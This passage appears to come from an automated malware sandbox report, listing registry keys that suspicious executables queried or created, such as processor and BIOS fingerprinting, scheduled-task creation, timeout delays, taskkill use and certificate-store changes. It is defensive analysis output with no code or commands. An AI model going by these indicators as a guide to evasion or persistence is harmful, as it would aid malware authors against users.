| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\HardwareID | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\UpperFilters | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\LowerFilters | C:\Windows\system32\DrvInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\ | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\LowerFilters | C:\Windows\system32\DrvInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006 | C:\Windows\system32\svchost.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\Documents\VysNse9aH2S6vEZG4VFDtDI3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Users\Admin\AppData\Local\Temp\974F.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\974F.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Users\Admin\Documents\VysNse9aH2S6vEZG4VFDtDI3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\974F.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Users\Admin\AppData\Local\Temp\974F.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Users\Admin\Documents\VysNse9aH2S6vEZG4VFDtDI3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Users\Admin\AppData\Local\Temp\974F.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Users\Admin\Documents\VysNse9aH2S6vEZG4VFDtDI3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ProviderPasswordCharacterGroups = "2" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\sihclient.exe | N/A |
